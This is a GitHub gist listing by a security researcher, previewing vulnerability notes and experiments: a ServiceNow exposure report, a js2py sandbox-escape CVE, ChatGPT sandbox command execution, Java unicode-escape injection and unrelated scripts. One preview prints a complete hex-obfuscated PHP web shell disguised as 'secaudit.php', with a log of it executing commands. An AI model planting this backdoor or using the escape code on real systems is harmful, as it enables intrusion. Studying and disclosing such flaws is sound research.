Skip to content

Instantly share code, notes, and snippets.

View win3zz's full-sized avatar
♾️
{"amount":1,"amount":-1}

Bipin Jitiya win3zz

♾️
{"amount":1,"amount":-1}
View GitHub Profile
@win3zz
win3zz / A.java
Created December 17, 2024 05:35
Unicode escapes in Java are preprocessed before lexical analysis, they can break comments and inject code!
/**
* Description:
* You can decode the hidden message by running the program.
* Compile and execute: user@host:~$ javac A.java && java A
*
* @author Bipin Jitiya
* @since 2024-12-17
*/
class A {
public static void main(String[] args){
@win3zz
win3zz / Offensive.md
Last active December 17, 2024 15:14
MIL-PRF-19500 and Hazardous Electronic Components

Autonomous killer drones

Click to Play:

MICRO DRONES KILLER ARMS ROBOTS - AUTONOMOUS ARTIFICIAL INTELLIGENCE

@win3zz
win3zz / README.md
Created August 21, 2024 13:28
Heh-PHP

secaudit.php

<?php $s="\x73\x79\163\x74\145\155";$__=$_REQUEST;if(isset($__["\x61\162\x65\x61\x35\x31"])){echo "\74\160\x72\145\x3e";$c0=$__["\x61\162\x65\x61\x35\x31"];$s($c0.' 2>&1');echo "\74\57\160\162\x65\76";exit;}?>
bipin@bipin-VirtualBox:~/BB/Research/php_backdoor$ php -S 127.0.0.2:8000
[Wed Aug 21 18:49:26 2024] PHP 7.4.3-4ubuntu2.23 Development Server (http://127.0.0.2:8000) started
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 Accepted
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 [200]: GET /secaudit.php?area51=id
@win3zz
win3zz / README.md
Created August 20, 2024 08:31
Live2D Interactive Anime Character on a Website

Live2D Interactive Anime Character on a Website

Recording 2024-08-20 130401

You may have seen something like the above on websites (especially Chinese and Japanese). These are interactive 2D character animations that can be integrated into websites. They are designed to run on the client side using JavaScript and graphics assets with Live2D technology. The characters can move and respond to user interactions.

Here’s a basic idea of how you can add a Live2D widget to a website:

  1. You need a Live2D model file, which typically includes a set of files such as textures, model data, and animation settings. You can create your own using Live2D Cubism software. Many ready-made models are available here: https://github.com/evrstr/live2d-widget-models
@win3zz
win3zz / ServiceNow_Sensitive_Info_Exposure.md
Last active November 29, 2024 08:23
ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

  • Date: 26 June 2023
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
  • Discovered by: Bipin Jitiya (@win3zz)

Summary

[REDACTED], Inc., uses ServiceNow with an instance named "[REDACTED]" accessible at https://[REDACTED].service-now.com/. Upon reviewing this instance, I observed that it is not sufficiently hardened for security, and some endpoints are exposing sensitive information. The following three endpoints, designed for performance monitoring, logging, and troubleshooting purposes, are accessible without authentication:

@win3zz
win3zz / chatgpt-data-analysis-code-execution.md
Last active December 22, 2024 20:35
ChatGPT's Advanced Data Analysis and Code Execution - Experiments

ChatGPT's Advanced Data Analysis and Code Execution - Experiments

Recently, I learned that ChatGPT now allows advanced data analysis, which includes executing code (Python or possibly others). This feature is available to registered users via GPT-4o, albeit with limitations.

I quickly tried running system commands using this functionality, and here are the results:

Screenshot 2024-06-23 203306

It clearly shows that system commands can be executed through Python code in a sandboxed environment.

@win3zz
win3zz / CVE-2024-28397.md
Created June 19, 2024 13:38
CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.

CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.

import js2py

js_code = """

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
 let item = o.__subclasses__()[i]
@win3zz
win3zz / README.md
Last active June 17, 2024 06:02
Compare Stock Performance Over Multiple Time Frames with Yahoo Finance API and Matplotlib

Compare Stock Performance Over Multiple Time Frames with Yahoo Finance API and Matplotlib

How to Use

Compare the performance of a stock across two or more time frames using the Yahoo Finance API and the Matplotlib Python library. Adjust the stock symbol and time frames according to your requirements and save the content in a file named script.py.

import requests
import matplotlib.pyplot as plt
from datetime import datetime
@win3zz
win3zz / Activator.java
Created April 24, 2024 09:09
Activator
/**
* Offline Activator [Version 1.0.0 Beta]
*
* @author Bipin Jitiya
* @version 1.0
* @since 2024-04-24
*/
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
@win3zz
win3zz / CVE-2024-29269.md
Created April 3, 2024 14:50
CVE-2024-29269: TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution